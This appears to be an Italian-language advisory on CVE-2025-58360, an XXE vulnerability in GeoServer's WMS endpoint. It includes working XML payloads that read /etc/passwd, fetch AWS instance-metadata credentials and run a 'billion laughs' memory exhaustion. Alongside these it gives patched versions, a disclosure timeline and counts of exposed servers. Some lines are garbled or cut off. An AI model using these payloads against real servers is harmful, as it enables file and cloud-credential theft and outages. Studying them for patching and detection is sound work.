
CVE-2025-58360

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:LQuesto è un XXE classico ma devastante nell'endpoint GetMap del Web Map Service (WMS).
Gli attaccanti possono:
/etc/passwd, geoserver.xml, chiavi private, ecc.)→ Sono decine di migliaia di server potenzialmente vulnerabili esposti su Internet aperto in questo momento! 🌐
Endpoint: POST /geoserver/wms
Parametro Chiave: SLD_BODY (permette stile XML grezzo)
Percorso del Codice Vulnerabile: Il parser XML non disabilita la risoluzione di entità esterne → XXE classico.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
<sld:UserLayer>
<sld:LayerFeatureConstraints>
<sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
</sld:LayerFeatureConstraints>
</sld:UserLayer>
</sld:StyledLayerDescriptor>
→ La risposta contiene il contenuto di /etc/passwd 🎉
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
→ Perde credenziali AWS temporanee se in esecuzione su EC2.
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!-- ripeti fino a lol9 -->
]>
<lol>&lol9;</lol>
→ Consuma gigabyte di RAM in secondi 💥
| Versione | Data di Rilascio | Link Download |
|---|---|---|
| 2.27.0 | 25 Nov 2025 | https://geoserver.org/release/stable/ |
Utenti Docker:
docker pull osgeo/geoserver:2.27.0
<!ENTITY o SYSTEM "file://| Data | Evento |
|---|---|
| Prima di Nov 2025 | Scoperto autonomamente dallo scanner AI XBOW |
| 25 Nov 2025 | Divulgazione coordinata → patch rilasciate |
| 25 Nov 2025 | CVE assegnato e pubblicato |
| 26 Nov 2025 | PoC diventano virali, scansioni di esposizione aumentano |
Questo è un XXE da manuale che colpisce una piattaforma geospaziale ampiamente distribuita con decine di migliaia di istanze esposte su Internet.
Patch rilasciate lo stesso giorno della divulgazione — grandi complimenti al team di GeoServer per la velocità! 🏆
Ma la finestra tra disponibilità delle patch e sfruttamento di massa si sta restringendo rapidamente.
Se gestisci GeoServer → aggiorna oggi.
Non diventare la prossima notizia.
Rimani sicuro, rimani splendente! 🛡️✨
| Componente | Versioni Vulnerabili | Corretto In | Stato |
|---|
| GeoServer Standalone | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.3, 2.25.6, 2.27.0 | 🔴 Vulnerabile |
| Docker (osgeo/geoserver) | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.27.0 | 🔴 Vulnerabile |
| Maven org.geoserver:gs-wms | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 Vulnerabile |
| Maven org.geoserver.web:gs-web-app | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 Vulnerabile |
| GeoServer 2.27.x e successive | – | Già patchato | ✅ Sicuro |
| Fonte | Istanze Esposte | Note |
|---|
| ZoomEye | ~49.400 | app:"GeoServer" ricerca |
| FOFA | ~24.000 | Risultati dell'ultimo anno |
| Shodan | ~31.000 | Porta 8080 + corrispondenza titolo |
| GobySec | ~20.000 | Scansione rete pubblica |
| 2.26.3 | 25 Nov 2025 | Patch ramo manutenzione |
| 2.25.6 | 25 Nov 2025 | Ramo supportato più vecchio |